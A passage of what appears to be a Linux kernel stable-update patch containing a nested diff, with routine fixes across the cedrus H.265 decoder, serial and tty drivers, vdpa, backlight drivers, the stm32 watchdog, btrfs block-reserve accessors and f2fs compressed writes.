++	v4l2_ctrl_handler_free(&ctx->ctrl_hdlr);
+ 	v4l2_m2m_ctx_release(ctx->fh.m2m_ctx);
+ 	v4l2_fh_del(&ctx->fh);
+ 	v4l2_fh_exit(&ctx->fh);
+diff --git a/drivers/staging/media/sunxi/cedrus/cedrus.h b/drivers/staging/media/sunxi/cedrus/cedrus.h
+index 93a2196006f73..cb99610f3e128 100644
+--- a/drivers/staging/media/sunxi/cedrus/cedrus.h
++++ b/drivers/staging/media/sunxi/cedrus/cedrus.h
+@@ -109,6 +109,11 @@ struct cedrus_buffer {
+ 			unsigned int			position;
+ 			enum cedrus_h264_pic_type	pic_type;
+ 		} h264;
++		struct {
++			void		*mv_col_buf;
++			dma_addr_t	mv_col_buf_dma;
++			ssize_t		mv_col_buf_size;
++		} h265;
+ 	} codec;
+ };
+ 
+@@ -142,10 +147,6 @@ struct cedrus_ctx {
+ 			ssize_t		intra_pred_buf_size;
+ 		} h264;
+ 		struct {
+-			void		*mv_col_buf;
+-			dma_addr_t	mv_col_buf_addr;
+-			ssize_t		mv_col_buf_size;
+-			ssize_t		mv_col_buf_unit_size;
+ 			void		*neighbor_info_buf;
+ 			dma_addr_t	neighbor_info_buf_addr;
+ 			void		*entry_points_buf;
+diff --git a/drivers/staging/media/sunxi/cedrus/cedrus_h265.c b/drivers/staging/media/sunxi/cedrus/cedrus_h265.c
+index 625f77a8c5bde..9f13c942a806b 100644
+--- a/drivers/staging/media/sunxi/cedrus/cedrus_h265.c
++++ b/drivers/staging/media/sunxi/cedrus/cedrus_h265.c
+@@ -90,12 +90,13 @@ static void cedrus_h265_sram_write_data(struct cedrus_dev *dev, void *data,
+ }
+ 
+ static inline dma_addr_t
+-cedrus_h265_frame_info_mv_col_buf_addr(struct cedrus_ctx *ctx,
+-				       unsigned int index, unsigned int field)
++cedrus_h265_frame_info_mv_col_buf_addr(struct vb2_buffer *buf,
++				       unsigned int field)
+ {
+-	return ctx->codec.h265.mv_col_buf_addr + index *
+-	       ctx->codec.h265.mv_col_buf_unit_size +
+-	       field * ctx->codec.h265.mv_col_buf_unit_size / 2;
++	struct cedrus_buffer *cedrus_buf = vb2_to_cedrus_buffer(buf);
++
++	return cedrus_buf->codec.h265.mv_col_buf_dma +
++	       field * cedrus_buf->codec.h265.mv_col_buf_size / 2;
+ }
+ 
+ static void cedrus_h265_frame_info_write_single(struct cedrus_ctx *ctx,
+@@ -108,9 +109,8 @@ static void cedrus_h265_frame_info_write_single(struct cedrus_ctx *ctx,
+ 	dma_addr_t dst_luma_addr = cedrus_dst_buf_addr(ctx, buf, 0);
+ 	dma_addr_t dst_chroma_addr = cedrus_dst_buf_addr(ctx, buf, 1);
+ 	dma_addr_t mv_col_buf_addr[2] = {
+-		cedrus_h265_frame_info_mv_col_buf_addr(ctx, buf->index, 0),
+-		cedrus_h265_frame_info_mv_col_buf_addr(ctx, buf->index,
+-						       field_pic ? 1 : 0)
++		cedrus_h265_frame_info_mv_col_buf_addr(buf, 0),
++		cedrus_h265_frame_info_mv_col_buf_addr(buf, field_pic ? 1 : 0)
+ 	};
+ 	u32 offset = VE_DEC_H265_SRAM_OFFSET_FRAME_INFO +
+ 		     VE_DEC_H265_SRAM_OFFSET_FRAME_INFO_UNIT * index;
+@@ -412,12 +412,13 @@ static int cedrus_h265_setup(struct cedrus_ctx *ctx, struct cedrus_run *run)
+ 	unsigned int width_in_ctb_luma, ctb_size_luma;
+ 	unsigned int log2_max_luma_coding_block_size;
+ 	unsigned int ctb_addr_x, ctb_addr_y;
++	struct cedrus_buffer *cedrus_buf;
+ 	dma_addr_t src_buf_addr;
+-	dma_addr_t src_buf_end_addr;
+ 	u32 chroma_log2_weight_denom;
+ 	u32 num_entry_point_offsets;
+ 	u32 output_pic_list_index;
+ 	u32 pic_order_cnt[2];
++	size_t slice_bytes;
+ 	u8 padding;
+ 	int count;
+ 	u32 reg;
+@@ -428,6 +429,8 @@ static int cedrus_h265_setup(struct cedrus_ctx *ctx, struct cedrus_run *run)
+ 	decode_params = run->h265.decode_params;
+ 	pred_weight_table = &slice_params->pred_weight_table;
+ 	num_entry_point_offsets = slice_params->num_entry_point_offsets;
++	cedrus_buf = vb2_to_cedrus_buffer(&run->dst->vb2_buf);
++	slice_bytes = vb2_get_plane_payload(&run->src->vb2_buf, 0);
+ 
+ 	/*
+ 	 * If entry points offsets are present, we should get them
+@@ -445,31 +448,25 @@ static int cedrus_h265_setup(struct cedrus_ctx *ctx, struct cedrus_run *run)
+ 		DIV_ROUND_UP(sps->pic_width_in_luma_samples, ctb_size_luma);
+ 
+ 	/* MV column buffer size and allocation. */
+-	if (!ctx->codec.h265.mv_col_buf_size) {
+-		unsigned int num_buffers =
+-			run->dst->vb2_buf.vb2_queue->num_buffers;
+-
++	if (!cedrus_buf->codec.h265.mv_col_buf_size) {
+ 		/*
+ 		 * Each CTB requires a MV col buffer with a specific unit size.
+ 		 * Since the address is given with missing lsb bits, 1 KiB is
+ 		 * added to each buffer to ensure proper alignment.
+ 		 */
+-		ctx->codec.h265.mv_col_buf_unit_size =
++		cedrus_buf->codec.h265.mv_col_buf_size =
+ 			DIV_ROUND_UP(ctx->src_fmt.width, ctb_size_luma) *
+ 			DIV_ROUND_UP(ctx->src_fmt.height, ctb_size_luma) *
+ 			CEDRUS_H265_MV_COL_BUF_UNIT_CTB_SIZE + SZ_1K;
+ 
+-		ctx->codec.h265.mv_col_buf_size = num_buffers *
+-			ctx->codec.h265.mv_col_buf_unit_size;
+-
+ 		/* Buffer is never accessed by CPU, so we can skip kernel mapping. */
+-		ctx->codec.h265.mv_col_buf =
++		cedrus_buf->codec.h265.mv_col_buf =
+ 			dma_alloc_attrs(dev->dev,
+-					ctx->codec.h265.mv_col_buf_size,
+-					&ctx->codec.h265.mv_col_buf_addr,
++					cedrus_buf->codec.h265.mv_col_buf_size,
++					&cedrus_buf->codec.h265.mv_col_buf_dma,
+ 					GFP_KERNEL, DMA_ATTR_NO_KERNEL_MAPPING);
+-		if (!ctx->codec.h265.mv_col_buf) {
+-			ctx->codec.h265.mv_col_buf_size = 0;
++		if (!cedrus_buf->codec.h265.mv_col_buf) {
++			cedrus_buf->codec.h265.mv_col_buf_size = 0;
+ 			return -ENOMEM;
+ 		}
+ 	}
+@@ -481,7 +478,7 @@ static int cedrus_h265_setup(struct cedrus_ctx *ctx, struct cedrus_run *run)
+ 
+ 	cedrus_write(dev, VE_DEC_H265_BITS_OFFSET, 0);
+ 
+-	reg = slice_params->bit_size;
++	reg = slice_bytes * 8;
+ 	cedrus_write(dev, VE_DEC_H265_BITS_LEN, reg);
+ 
+ 	/* Source beginning and end addresses. */
+@@ -495,10 +492,7 @@ static int cedrus_h265_setup(struct cedrus_ctx *ctx, struct cedrus_run *run)
+ 
+ 	cedrus_write(dev, VE_DEC_H265_BITS_ADDR, reg);
+ 
+-	src_buf_end_addr = src_buf_addr +
+-			   DIV_ROUND_UP(slice_params->bit_size, 8);
+-
+-	reg = VE_DEC_H265_BITS_END_ADDR_BASE(src_buf_end_addr);
++	reg = VE_DEC_H265_BITS_END_ADDR_BASE(src_buf_addr + slice_bytes);
+ 	cedrus_write(dev, VE_DEC_H265_BITS_END_ADDR, reg);
+ 
+ 	/* Coding tree block address */
+@@ -816,9 +810,6 @@ static int cedrus_h265_start(struct cedrus_ctx *ctx)
+ {
+ 	struct cedrus_dev *dev = ctx->dev;
+ 
+-	/* The buffer size is calculated at setup time. */
+-	ctx->codec.h265.mv_col_buf_size = 0;
+-
+ 	/* Buffer is never accessed by CPU, so we can skip kernel mapping. */
+ 	ctx->codec.h265.neighbor_info_buf =
+ 		dma_alloc_attrs(dev->dev, CEDRUS_H265_NEIGHBOR_INFO_BUF_SIZE,
+@@ -845,14 +836,24 @@ static int cedrus_h265_start(struct cedrus_ctx *ctx)
+ static void cedrus_h265_stop(struct cedrus_ctx *ctx)
+ {
+ 	struct cedrus_dev *dev = ctx->dev;
++	struct cedrus_buffer *buf;
++	struct vb2_queue *vq;
++	unsigned int i;
+ 
+-	if (ctx->codec.h265.mv_col_buf_size > 0) {
+-		dma_free_attrs(dev->dev, ctx->codec.h265.mv_col_buf_size,
+-			       ctx->codec.h265.mv_col_buf,
+-			       ctx->codec.h265.mv_col_buf_addr,
+-			       DMA_ATTR_NO_KERNEL_MAPPING);
++	vq = v4l2_m2m_get_vq(ctx->fh.m2m_ctx, V4L2_BUF_TYPE_VIDEO_CAPTURE);
++
++	for (i = 0; i < vq->num_buffers; i++) {
++		buf = vb2_to_cedrus_buffer(vb2_get_buffer(vq, i));
+ 
+-		ctx->codec.h265.mv_col_buf_size = 0;
++		if (buf->codec.h265.mv_col_buf_size > 0) {
++			dma_free_attrs(dev->dev,
++				       buf->codec.h265.mv_col_buf_size,
++				       buf->codec.h265.mv_col_buf,
++				       buf->codec.h265.mv_col_buf_dma,
++				       DMA_ATTR_NO_KERNEL_MAPPING);
++
++			buf->codec.h265.mv_col_buf_size = 0;
++		}
+ 	}
+ 
+ 	dma_free_attrs(dev->dev, CEDRUS_H265_NEIGHBOR_INFO_BUF_SIZE,
+diff --git a/drivers/tty/serial/8250/8250_exar.c b/drivers/tty/serial/8250/8250_exar.c
+index dca1abe363248..55451ff846520 100644
+--- a/drivers/tty/serial/8250/8250_exar.c
++++ b/drivers/tty/serial/8250/8250_exar.c
+@@ -714,6 +714,7 @@ static void exar_pci_remove(struct pci_dev *pcidev)
+ 	for (i = 0; i < priv->nr; i++)
+ 		serial8250_unregister_port(priv->line[i]);
+ 
++	/* Ensure that every init quirk is properly torn down */
+ 	if (priv->board->exit)
+ 		priv->board->exit(pcidev);
+ }
+@@ -728,10 +729,6 @@ static int __maybe_unused exar_suspend(struct device *dev)
+ 		if (priv->line[i] >= 0)
+ 			serial8250_suspend_port(priv->line[i]);
+ 
+-	/* Ensure that every init quirk is properly torn down */
+-	if (priv->board->exit)
+-		priv->board->exit(pcidev);
+-
+ 	return 0;
+ }
+ 
+diff --git a/drivers/tty/serial/max310x.c b/drivers/tty/serial/max310x.c
+index 163a89f84c9c2..444f89eb2d4b7 100644
+--- a/drivers/tty/serial/max310x.c
++++ b/drivers/tty/serial/max310x.c
+@@ -1459,7 +1459,7 @@ static int max310x_probe(struct device *dev, const struct max310x_devtype *devty
+ 	if (!ret)
+ 		return 0;
+ 
+-	dev_err(dev, "Unable to reguest IRQ %i\n", irq);
++	dev_err(dev, "Unable to request IRQ %i\n", irq);
+ 
+ out_uart:
+ 	for (i = 0; i < devtype->nr; i++) {
+diff --git a/drivers/tty/serial/samsung_tty.c b/drivers/tty/serial/samsung_tty.c
+index aa2c51b84116f..589daed19e625 100644
+--- a/drivers/tty/serial/samsung_tty.c
++++ b/drivers/tty/serial/samsung_tty.c
+@@ -996,11 +996,10 @@ static unsigned int s3c24xx_serial_tx_empty(struct uart_port *port)
+ 		if ((ufstat & info->tx_fifomask) != 0 ||
+ 		    (ufstat & info->tx_fifofull))
+ 			return 0;
+-
+-		return 1;
++		return TIOCSER_TEMT;
+ 	}
+ 
+-	return s3c24xx_serial_txempty_nofifo(port);
++	return s3c24xx_serial_txempty_nofifo(port) ? TIOCSER_TEMT : 0;
+ }
+ 
+ /* no modem control lines */
+diff --git a/drivers/tty/vt/vt.c b/drivers/tty/vt/vt.c
+index 981d2bfcf9a5b..9e30ef2b6eb8c 100644
+--- a/drivers/tty/vt/vt.c
++++ b/drivers/tty/vt/vt.c
+@@ -2515,7 +2515,7 @@ static void do_con_trol(struct tty_struct *tty, struct vc_data *vc, int c)
+ 		}
+ 		return;
+ 	case EScsiignore:
+-		if (c >= 20 && c <= 0x3f)
++		if (c >= 0x20 && c <= 0x3f)
+ 			return;
+ 		vc->vc_state = ESnormal;
+ 		return;
+diff --git a/drivers/usb/gadget/udc/net2272.c b/drivers/usb/gadget/udc/net2272.c
+index 538c1b9a28835..c42d5aa99e81a 100644
+--- a/drivers/usb/gadget/udc/net2272.c
++++ b/drivers/usb/gadget/udc/net2272.c
+@@ -2650,7 +2650,7 @@ net2272_plat_probe(struct platform_device *pdev)
+ 		goto err_req;
+ 	}
+ 
+-	ret = net2272_probe_fin(dev, IRQF_TRIGGER_LOW);
++	ret = net2272_probe_fin(dev, irqflags);
+ 	if (ret)
+ 		goto err_io;
+ 
+diff --git a/drivers/usb/phy/phy-generic.c b/drivers/usb/phy/phy-generic.c
+index 3dc5c04e7cbf9..953df04b40d40 100644
+--- a/drivers/usb/phy/phy-generic.c
++++ b/drivers/usb/phy/phy-generic.c
+@@ -265,6 +265,13 @@ int usb_phy_gen_create_phy(struct device *dev, struct usb_phy_generic *nop)
+ 			return -EPROBE_DEFER;
+ 	}
+ 
++	nop->vbus_draw = devm_regulator_get_exclusive(dev, "vbus");
++	if (PTR_ERR(nop->vbus_draw) == -ENODEV)
++		nop->vbus_draw = NULL;
++	if (IS_ERR(nop->vbus_draw))
++		return dev_err_probe(dev, PTR_ERR(nop->vbus_draw),
++				     "could not get vbus regulator\n");
++
+ 	nop->vbus_draw = devm_regulator_get_exclusive(dev, "vbus");
+ 	if (PTR_ERR(nop->vbus_draw) == -ENODEV)
+ 		nop->vbus_draw = NULL;
+diff --git a/drivers/vdpa/mlx5/net/mlx5_vnet.c b/drivers/vdpa/mlx5/net/mlx5_vnet.c
+index 2b7e796c48897..74d295312466f 100644
+--- a/drivers/vdpa/mlx5/net/mlx5_vnet.c
++++ b/drivers/vdpa/mlx5/net/mlx5_vnet.c
+@@ -185,8 +185,6 @@ static void teardown_driver(struct mlx5_vdpa_net *ndev);
+ 
+ static bool mlx5_vdpa_debug;
+ 
+-#define MLX5_CVQ_MAX_ENT 16
+-
+ #define MLX5_LOG_VIO_FLAG(_feature)                                                                \
+ 	do {                                                                                       \
+ 		if (features & BIT_ULL(_feature))                                                  \
+@@ -1980,9 +1978,16 @@ static void mlx5_vdpa_set_vq_num(struct vdpa_device *vdev, u16 idx, u32 num)
+ 	struct mlx5_vdpa_net *ndev = to_mlx5_vdpa_ndev(mvdev);
+ 	struct mlx5_vdpa_virtqueue *mvq;
+ 
+-	if (!is_index_valid(mvdev, idx) || is_ctrl_vq_idx(mvdev, idx))
++	if (!is_index_valid(mvdev, idx))
+ 		return;
+ 
++        if (is_ctrl_vq_idx(mvdev, idx)) {
++                struct mlx5_control_vq *cvq = &mvdev->cvq;
++
++                cvq->vring.vring.num = num;
++                return;
++        }
++
+ 	mvq = &ndev->vqs[idx];
+ 	mvq->num_ent = num;
+ }
+@@ -2512,7 +2517,7 @@ static int setup_cvq_vring(struct mlx5_vdpa_dev *mvdev)
+ 		u16 idx = cvq->vring.last_avail_idx;
+ 
+ 		err = vringh_init_iotlb(&cvq->vring, mvdev->actual_features,
+-					MLX5_CVQ_MAX_ENT, false,
++					cvq->vring.vring.num, false,
+ 					(struct vring_desc *)(uintptr_t)cvq->desc_addr,
+ 					(struct vring_avail *)(uintptr_t)cvq->driver_addr,
+ 					(struct vring_used *)(uintptr_t)cvq->device_addr);
+diff --git a/drivers/vdpa/vdpa_sim/vdpa_sim.c b/drivers/vdpa/vdpa_sim/vdpa_sim.c
+index 61bde476cf9c8..e7fc25bfdd237 100644
+--- a/drivers/vdpa/vdpa_sim/vdpa_sim.c
++++ b/drivers/vdpa/vdpa_sim/vdpa_sim.c
+@@ -120,7 +120,7 @@ static void vdpasim_do_reset(struct vdpasim *vdpasim)
+ 	for (i = 0; i < vdpasim->dev_attr.nas; i++)
+ 		vhost_iotlb_reset(&vdpasim->iommu[i]);
+ 
+-	vdpasim->running = true;
++	vdpasim->running = false;
+ 	spin_unlock(&vdpasim->iommu_lock);
+ 
+ 	vdpasim->features = 0;
+@@ -513,6 +513,7 @@ static void vdpasim_set_status(struct vdpa_device *vdpa, u8 status)
+ 
+ 	spin_lock(&vdpasim->lock);
+ 	vdpasim->status = status;
++	vdpasim->running = (status & VIRTIO_CONFIG_S_DRIVER_OK) != 0;
+ 	spin_unlock(&vdpasim->lock);
+ }
+ 
+diff --git a/drivers/video/backlight/da9052_bl.c b/drivers/video/backlight/da9052_bl.c
+index 882359dd288c0..aa00379392a0f 100644
+--- a/drivers/video/backlight/da9052_bl.c
++++ b/drivers/video/backlight/da9052_bl.c
+@@ -117,6 +117,7 @@ static int da9052_backlight_probe(struct platform_device *pdev)
+ 	wleds->led_reg = platform_get_device_id(pdev)->driver_data;
+ 	wleds->state = DA9052_WLEDS_OFF;
+ 
++	memset(&props, 0, sizeof(struct backlight_properties));
+ 	props.type = BACKLIGHT_RAW;
+ 	props.max_brightness = DA9052_MAX_BRIGHTNESS;
+ 
+diff --git a/drivers/video/backlight/lm3630a_bl.c b/drivers/video/backlight/lm3630a_bl.c
+index 475f35635bf67..0d43f6326750f 100644
+--- a/drivers/video/backlight/lm3630a_bl.c
++++ b/drivers/video/backlight/lm3630a_bl.c
+@@ -231,7 +231,7 @@ static int lm3630a_bank_a_get_brightness(struct backlight_device *bl)
+ 		if (rval < 0)
+ 			goto out_i2c_err;
+ 		brightness |= rval;
+-		goto out;
++		return brightness;
+ 	}
+ 
+ 	/* disable sleep */
+@@ -242,11 +242,8 @@ static int lm3630a_bank_a_get_brightness(struct backlight_device *bl)
+ 	rval = lm3630a_read(pchip, REG_BRT_A);
+ 	if (rval < 0)
+ 		goto out_i2c_err;
+-	brightness = rval;
++	return rval;
+ 
+-out:
+-	bl->props.brightness = brightness;
+-	return bl->props.brightness;
+ out_i2c_err:
+ 	dev_err(pchip->dev, "i2c failed to access register\n");
+ 	return 0;
+@@ -306,7 +303,7 @@ static int lm3630a_bank_b_get_brightness(struct backlight_device *bl)
+ 		if (rval < 0)
+ 			goto out_i2c_err;
+ 		brightness |= rval;
+-		goto out;
++		return brightness;
+ 	}
+ 
+ 	/* disable sleep */
+@@ -317,11 +314,8 @@ static int lm3630a_bank_b_get_brightness(struct backlight_device *bl)
+ 	rval = lm3630a_read(pchip, REG_BRT_B);
+ 	if (rval < 0)
+ 		goto out_i2c_err;
+-	brightness = rval;
++	return rval;
+ 
+-out:
+-	bl->props.brightness = brightness;
+-	return bl->props.brightness;
+ out_i2c_err:
+ 	dev_err(pchip->dev, "i2c failed to access register\n");
+ 	return 0;
+@@ -339,6 +333,7 @@ static int lm3630a_backlight_register(struct lm3630a_chip *pchip)
+ 	struct backlight_properties props;
+ 	const char *label;
+ 
++	memset(&props, 0, sizeof(struct backlight_properties));
+ 	props.type = BACKLIGHT_RAW;
+ 	if (pdata->leda_ctrl != LM3630A_LEDA_DISABLE) {
+ 		props.brightness = pdata->leda_init_brt;
+diff --git a/drivers/video/backlight/lm3639_bl.c b/drivers/video/backlight/lm3639_bl.c
+index 6580911671a3e..4c9726a7fa720 100644
+--- a/drivers/video/backlight/lm3639_bl.c
++++ b/drivers/video/backlight/lm3639_bl.c
+@@ -339,6 +339,7 @@ static int lm3639_probe(struct i2c_client *client,
+ 	}
+ 
+ 	/* backlight */
++	memset(&props, 0, sizeof(struct backlight_properties));
+ 	props.type = BACKLIGHT_RAW;
+ 	props.brightness = pdata->init_brt_led;
+ 	props.max_brightness = pdata->max_brt_led;
+diff --git a/drivers/video/backlight/lp8788_bl.c b/drivers/video/backlight/lp8788_bl.c
+index ba42f3fe0c739..d9b95dbd40d30 100644
+--- a/drivers/video/backlight/lp8788_bl.c
++++ b/drivers/video/backlight/lp8788_bl.c
+@@ -191,6 +191,7 @@ static int lp8788_backlight_register(struct lp8788_bl *bl)
+ 	int init_brt;
+ 	char *name;
+ 
++	memset(&props, 0, sizeof(struct backlight_properties));
+ 	props.type = BACKLIGHT_PLATFORM;
+ 	props.max_brightness = MAX_BRIGHTNESS;
+ 
+diff --git a/drivers/watchdog/stm32_iwdg.c b/drivers/watchdog/stm32_iwdg.c
+index 570a71509d2a9..78d51deab87aa 100644
+--- a/drivers/watchdog/stm32_iwdg.c
++++ b/drivers/watchdog/stm32_iwdg.c
+@@ -21,6 +21,8 @@
+ #include <linux/platform_device.h>
+ #include <linux/watchdog.h>
+ 
++#define DEFAULT_TIMEOUT 10
++
+ /* IWDG registers */
+ #define IWDG_KR		0x00 /* Key register */
+ #define IWDG_PR		0x04 /* Prescaler Register */
+@@ -249,6 +251,7 @@ static int stm32_iwdg_probe(struct platform_device *pdev)
+ 	wdd->parent = dev;
+ 	wdd->info = &stm32_iwdg_info;
+ 	wdd->ops = &stm32_iwdg_ops;
++	wdd->timeout = DEFAULT_TIMEOUT;
+ 	wdd->min_timeout = DIV_ROUND_UP((RLR_MIN + 1) * PR_MIN, wdt->rate);
+ 	wdd->max_hw_heartbeat_ms = ((RLR_MAX + 1) * wdt->data->max_prescaler *
+ 				    1000) / wdt->rate;
+diff --git a/fs/afs/dir.c b/fs/afs/dir.c
+index 6e2c967fae6fc..07dc4ec73520c 100644
+--- a/fs/afs/dir.c
++++ b/fs/afs/dir.c
+@@ -473,16 +473,6 @@ static int afs_dir_iterate_block(struct afs_vnode *dvnode,
+ 			continue;
+ 		}
+ 
+-		/* Don't expose silly rename entries to userspace. */
+-		if (nlen > 6 &&
+-		    dire->u.name[0] == '.' &&
+-		    ctx->actor != afs_lookup_filldir &&
+-		    ctx->actor != afs_lookup_one_filldir &&
+-		    memcmp(dire->u.name, ".__afs", 6) == 0) {
+-			ctx->pos = blkoff + next * sizeof(union afs_xdr_dirent);
+-			continue;
+-		}
+-
+ 		/* found the next entry */
+ 		if (!dir_emit(ctx, dire->u.name, nlen,
+ 			      ntohl(dire->u.vnode),
+diff --git a/fs/btrfs/block-rsv.c b/fs/btrfs/block-rsv.c
+index 507b44d18572d..4cbf386166209 100644
+--- a/fs/btrfs/block-rsv.c
++++ b/fs/btrfs/block-rsv.c
+@@ -512,7 +512,7 @@ struct btrfs_block_rsv *btrfs_use_block_rsv(struct btrfs_trans_handle *trans,
+ 
+ 	block_rsv = get_block_rsv(trans, root);
+ 
+-	if (unlikely(block_rsv->size == 0))
++	if (unlikely(btrfs_block_rsv_size(block_rsv) == 0))
+ 		goto try_reserve;
+ again:
+ 	ret = btrfs_block_rsv_use_bytes(block_rsv, blocksize);
+diff --git a/fs/btrfs/block-rsv.h b/fs/btrfs/block-rsv.h
+index 578c3497a455c..df87c4949d065 100644
+--- a/fs/btrfs/block-rsv.h
++++ b/fs/btrfs/block-rsv.h
+@@ -101,4 +101,36 @@ static inline bool btrfs_block_rsv_full(const struct btrfs_block_rsv *rsv)
+ 	return data_race(rsv->full);
+ }
+ 
++/*
++ * Get the reserved mount of a block reserve in a context where getting a stale
++ * value is acceptable, instead of accessing it directly and trigger data race
++ * warning from KCSAN.
++ */
++static inline u64 btrfs_block_rsv_reserved(struct btrfs_block_rsv *rsv)
++{
++	u64 ret;
++
++	spin_lock(&rsv->lock);
++	ret = rsv->reserved;
++	spin_unlock(&rsv->lock);
++
++	return ret;
++}
++
++/*
++ * Get the size of a block reserve in a context where getting a stale value is
++ * acceptable, instead of accessing it directly and trigger data race warning
++ * from KCSAN.
++ */
++static inline u64 btrfs_block_rsv_size(struct btrfs_block_rsv *rsv)
++{
++	u64 ret;
++
++	spin_lock(&rsv->lock);
++	ret = rsv->size;
++	spin_unlock(&rsv->lock);
++
++	return ret;
++}
++
+ #endif /* BTRFS_BLOCK_RSV_H */
+diff --git a/fs/btrfs/space-info.c b/fs/btrfs/space-info.c
+index 2635fb4bffa06..8b75f436a9a3c 100644
+--- a/fs/btrfs/space-info.c
++++ b/fs/btrfs/space-info.c
+@@ -847,7 +847,7 @@ btrfs_calc_reclaim_metadata_size(struct btrfs_fs_info *fs_info,
+ static bool need_preemptive_reclaim(struct btrfs_fs_info *fs_info,
+ 				    struct btrfs_space_info *space_info)
+ {
+-	u64 global_rsv_size = fs_info->global_block_rsv.reserved;
++	const u64 global_rsv_size = btrfs_block_rsv_reserved(&fs_info->global_block_rsv);
+ 	u64 ordered, delalloc;
+ 	u64 total = writable_total_bytes(fs_info, space_info);
+ 	u64 thresh;
+@@ -948,8 +948,8 @@ static bool need_preemptive_reclaim(struct btrfs_fs_info *fs_info,
+ 	ordered = percpu_counter_read_positive(&fs_info->ordered_bytes) >> 1;
+ 	delalloc = percpu_counter_read_positive(&fs_info->delalloc_bytes);
+ 	if (ordered >= delalloc)
+-		used += fs_info->delayed_refs_rsv.reserved +
+-			fs_info->delayed_block_rsv.reserved;
++		used += btrfs_block_rsv_reserved(&fs_info->delayed_refs_rsv) +
++			btrfs_block_rsv_reserved(&fs_info->delayed_block_rsv);
+ 	else
+ 		used += space_info->bytes_may_use - global_rsv_size;
+ 
+@@ -1164,7 +1164,7 @@ static void btrfs_preempt_reclaim_metadata_space(struct work_struct *work)
+ 		enum btrfs_flush_state flush;
+ 		u64 delalloc_size = 0;
+ 		u64 to_reclaim, block_rsv_size;
+-		u64 global_rsv_size = global_rsv->reserved;
++		const u64 global_rsv_size = btrfs_block_rsv_reserved(global_rsv);
+ 
+ 		loops++;
+ 
+@@ -1176,9 +1176,9 @@ static void btrfs_preempt_reclaim_metadata_space(struct work_struct *work)
+ 		 * assume it's tied up in delalloc reservations.
+ 		 */
+ 		block_rsv_size = global_rsv_size +
+-			delayed_block_rsv->reserved +
+-			delayed_refs_rsv->reserved +
+-			trans_rsv->reserved;
++			btrfs_block_rsv_reserved(delayed_block_rsv) +
++			btrfs_block_rsv_reserved(delayed_refs_rsv) +
++			btrfs_block_rsv_reserved(trans_rsv);
+ 		if (block_rsv_size < space_info->bytes_may_use)
+ 			delalloc_size = space_info->bytes_may_use - block_rsv_size;
+ 
+@@ -1198,16 +1198,16 @@ static void btrfs_preempt_reclaim_metadata_space(struct work_struct *work)
+ 			to_reclaim = delalloc_size;
+ 			flush = FLUSH_DELALLOC;
+ 		} else if (space_info->bytes_pinned >
+-			   (delayed_block_rsv->reserved +
+-			    delayed_refs_rsv->reserved)) {
++			   (btrfs_block_rsv_reserved(delayed_block_rsv) +
++			    btrfs_block_rsv_reserved(delayed_refs_rsv))) {
+ 			to_reclaim = space_info->bytes_pinned;
+ 			flush = COMMIT_TRANS;
+-		} else if (delayed_block_rsv->reserved >
+-			   delayed_refs_rsv->reserved) {
+-			to_reclaim = delayed_block_rsv->reserved;
++		} else if (btrfs_block_rsv_reserved(delayed_block_rsv) >
++			   btrfs_block_rsv_reserved(delayed_refs_rsv)) {
++			to_reclaim = btrfs_block_rsv_reserved(delayed_block_rsv);
+ 			flush = FLUSH_DELAYED_ITEMS_NR;
+ 		} else {
+-			to_reclaim = delayed_refs_rsv->reserved;
++			to_reclaim = btrfs_block_rsv_reserved(delayed_refs_rsv);
+ 			flush = FLUSH_DELAYED_REFS_NR;
+ 		}
+ 
+diff --git a/fs/f2fs/checkpoint.c b/fs/f2fs/checkpoint.c
+index eb4d69f53337f..3ec203bbd5593 100644
+--- a/fs/f2fs/checkpoint.c
++++ b/fs/f2fs/checkpoint.c
+@@ -70,7 +70,7 @@ static struct page *__get_meta_page(struct f2fs_sb_info *sbi, pgoff_t index,
+ 		.old_blkaddr = index,
+ 		.new_blkaddr = index,
+ 		.encrypted_page = NULL,
+-		.is_por = !is_meta,
++		.is_por = !is_meta ? 1 : 0,
+ 	};
+ 	int err;
+ 
+@@ -234,8 +234,8 @@ int f2fs_ra_meta_pages(struct f2fs_sb_info *sbi, block_t start, int nrpages,
+ 		.op = REQ_OP_READ,
+ 		.op_flags = sync ? (REQ_META | REQ_PRIO) : REQ_RAHEAD,
+ 		.encrypted_page = NULL,
+-		.in_list = false,
+-		.is_por = (type == META_POR),
++		.in_list = 0,
++		.is_por = (type == META_POR) ? 1 : 0,
+ 	};
+ 	struct blk_plug plug;
+ 	int err;
+diff --git a/fs/f2fs/compress.c b/fs/f2fs/compress.c
+index 967262c37da52..df6dfd7de6d0d 100644
+--- a/fs/f2fs/compress.c
++++ b/fs/f2fs/compress.c
+@@ -1249,10 +1249,11 @@ static int f2fs_write_compressed_pages(struct compress_ctx *cc,
+ 		.page = NULL,
+ 		.encrypted_page = NULL,
+ 		.compressed_page = NULL,
+-		.submitted = false,
++		.submitted = 0,
+ 		.io_type = io_type,
+ 		.io_wbc = wbc,
+-		.encrypted = fscrypt_inode_uses_fs_layer_crypto(cc->inode),
++		.encrypted = fscrypt_inode_uses_fs_layer_crypto(cc->inode) ?
++									1 : 0,
+ 	};
+ 	struct dnode_of_data dn;
+ 	struct node_info ni;
+@@ -1387,8 +1388,6 @@ static int f2fs_write_compressed_pages(struct compress_ctx *cc,
+ 	add_compr_block_stat(inode, cc->valid_nr_cpages);
+ 
+ 	set_inode_flag(cc->inode, FI_APPEND_WRITE);
+-	if (cc->cluster_idx == 0)
+-		set_inode_flag(inode, FI_FIRST_BLOCK_WRITTEN);
+ 
+ 	f2fs_put_dnode(&dn);
+ 	if (quota_inode)
+@@ -1436,6 +1435,8 @@ void f2fs_compress_write_end_io(struct bio *bio, struct page *page)
+ 	struct f2fs_sb_info *sbi = bio->bi_private;
+ 	struct compress_io_ctx *cic =
+ 			(struct compress_io_ctx *)page_private(page);
++	enum count_type type = WB_DATA_TYPE(page,
++				f2fs_is_compressed_page(page));
+ 	int i;
+ 
+ 	if (unlikely(bio->bi_status))
+@@ -1443,7 +1444,7 @@ void f2fs_compress_write_end_io(struct bio *bio, struct page *page)
+ 
+ 	f2fs_compress_free_page(page);
+ 
+-	dec_page_count(sbi, F2FS_WB_DATA);
++	dec_page_count(sbi, type);
+ 
+ 	if (atomic_dec_return(&cic->pending_pages))
+ 		return;
+@@ -1459,12 +1460,14 @@ void f2fs_compress_write_end_io(struct bio *bio, struct page *page)
+ }
+ 
+ static int f2fs_write_raw_pages(struct compress_ctx *cc,
+-					int *submitted,
++					int *submitted_p,
+ 					struct writeback_control *wbc,
+ 					enum iostat_type io_type)
+ {
+ 	struct address_space *mapping = cc->inode->i_mapping;
